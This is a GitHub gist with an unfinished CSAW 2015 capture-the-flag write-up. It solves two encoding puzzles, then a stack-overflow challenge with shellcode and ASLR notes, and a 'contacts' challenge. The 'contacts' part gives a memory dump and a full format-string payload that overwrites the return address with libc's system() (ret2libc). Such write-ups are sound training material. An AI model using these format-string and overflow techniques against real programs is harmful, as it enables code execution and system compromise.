Skip to content

Instantly share code, notes, and snippets.

@parksjin01

parksjin01/CSAW 2015 writeup.md

Last active April 7, 2017 11:08
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save parksjin01/5d7956871d45e77b86842a944aa24875 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save parksjin01/5d7956871d45e77b86842a944aa24875 to your computer and use it in GitHub Desktop.
Download ZIP
CSAW 2015 writeup
Raw
CSAW 2015 writeup.md

zer0-day

  • You can get hint in last sentence(= is used as padding)
  • split string by \n and do base64 decoding each sentence.
  • flag: flag{We are fsociety, we are finally free, we are finally awake!}

ones and zer0s

  • change binary to ascii.
  • flag: flag{People always make the best exploits.}

precision

  • To solve this prob, we should not change the float value and we have to change ret.
  • Stack looks like this [USER_INPUT*0x80] + [float_value]*2 + [dummy]*0x8 + sfp + ret
  • I'll input shellcode in USER_INPUT area and I'll use shellcode in here
  • This program use aslr and we need to bypass aslr, but they address of buffer so we can just use it.
  • Answer program is uploaded at here

contacts

  • We can find fsb in printing contacts
  • I'll suppose ASLR is turned off at first

0xffffd590: 0x0804c420 0x0804c410 0xf7e61cab 0x00000000
0xffffd5a0: 0xf7fb4000 0xf7fb4000 0xffffd5d8 0x08048c99
0xffffd5b0: 0x0804b0a8 0x00000028 0x0804c410 0x0804c420
0xffffd5c0: 0xf7fb4d60 0x08048ed6 0x0804b0a0 0x00000000
0xffffd5d0: 0xf7fb4000 0x00000000 0xffffd608 0x080487a2
0xffffd5e0: 0x0804b0a0 0xffffd5f8 0x00000050 0x00000000
0xffffd5f0: 0xf7fb43dc 0x08048288 0x00000004 0x0000000a
0xffffd600: 0xf7fb4000 0xf7fb4000 0x00000000 0xf7e1a637
0xffffd610: 0x00000001 0xffffd6a4 0xffffd6ac 0x00000000
0xffffd620: 0x00000000 0x00000000 0xf7fb4000 0xf7ffdc04

  • 0xffffd5a8 can change 0xffffd5d8 and 0xffffd5d8 can change anywhere.
  • 0xffffd60c is ret address of main loop.
  • I changed it to system function address in libc. (I used ret2libc because stack and heap's nx bit is enabled
  • payload: 'print "1\n"+"aaaa\n"+"1111\n"+"400\n"+"%54796c"+"%6$hn"+"\n"+"1\n"+"aaaa\n2222\n400\n"+"%52640c"+"%18$n"+"\n"+"1\n"+"aaaa\n3333\n400\n"+"%54798c"+"%6$hn"+"\n"+"aaaa\n4444\n400\n"+"%63459c"+"%18$n"+"\n"+"1\n"+"aaaa\n5555\n400\n"+"%54804c"+"%6$hn"+"\n"+"aaaa\n6666\n400\n"+"%55339c"+"%18$n"+"\n"+"1\n"+"aaaa\n7777\n400\n"+"%54806c"+"%6$hn"+"\n"+"aaaa\n8888\n400\n"+"%63477c"+"%18$n"+"\n"+"1\n"+"aaaa\n9999\n400\n"+"%54792c"+"%6$hn"+"\n"+"4\n"+"5\n"'
  • But we have to bypass aslr and we have to leak memory and cal proper address
  • Program to pwn is at here, It's dirty code yet but I'll change it soon

Not yet finished

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment